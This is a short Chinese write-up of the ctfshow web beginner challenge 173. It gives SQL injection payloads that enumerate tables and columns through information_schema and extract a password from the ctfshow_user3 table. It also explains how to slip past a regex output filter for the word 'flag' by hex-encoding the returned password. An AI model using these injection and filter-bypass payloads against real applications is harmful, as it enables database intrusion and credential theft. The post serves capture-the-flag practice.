ctf show web 入门173

1' union select 1,table_name,3 from information_schema.tables where table_schema=database()--+

1' union select 1,column_name,3 from information_schema.columns where table_name='ctfshow_user3'--+

这里跟上一题的不同之处在于:

1.原本只查询了 username, password 两个字段,现在变成了 id, username, password 三个字段

所以payload要改变为:-1' union select 1, 'hack', password from ctfshow_user3 where username='flag'--+

2.上一关只是检查 username 是不是 'flag'。而这一关,它把整个返回的数组 $ret 转换成了 JSON 字符串,然后用正则表达式模糊匹配只要任何一个角落包含 f-l-a-g 四个字母就不行 preg_match('/flag/i', ...) 检查

  • 这意味着: 只要最终返回给前端的整行数据里,包含"flag"这四个字母(不区分大小写),就会直接触发拦截,比如,假设密码中有flag也会把回显的内容过滤掉,此时我们使用HEX(password)把返回的密码编码从而绕过限制
相关推荐
不可求~2 小时前
多模型路由怎么落地:把任务分流写进项目的最小实现
java·前端·数据库
Lumistory2 小时前
城市建筑照明的落地与长效运营观察
大数据·数据库·中间件·光照贴图
布莱克6054 小时前
理解 MySQL 架构:从连接层到存储引擎
mysql
围炉聊科技5 小时前
长期免费的数据库方案——零成本基建系列
数据库
AC赳赳老秦5 小时前
公开图片 OCR 数据提取:OpenClaw 合规采集公开信息图,识别文字与表格并转化为结构化数据
java·大数据·前端·数据库·python·php·openclaw
PC2005-cloud5 小时前
DeepSeek Harness 创建 skill 指南:结构、安装、使用
笔记·学习
bransyin6 小时前
一个 SQL 字段到底是怎么算出来的?我做了一个能给出“证据”的血缘工具
大数据·sql·ai·血缘
梁辰兴7 小时前
软件工程:数据结构设计
数据库·软件工程·设计原则·设计方法·梁辰兴·数据库结构设计·数据库结构类型
库玛西7 小时前
现代 C++ 智能指针全景指南:从 RAII 思想到工业级实践
c语言·开发语言·c++·笔记·面试
AC赳赳老秦7 小时前
风控岗应用:OpenClaw 采集公开司法与经营异常数据,自动生成企业风险评估报告
大数据·c语言·数据库·人工智能·python·php·openclaw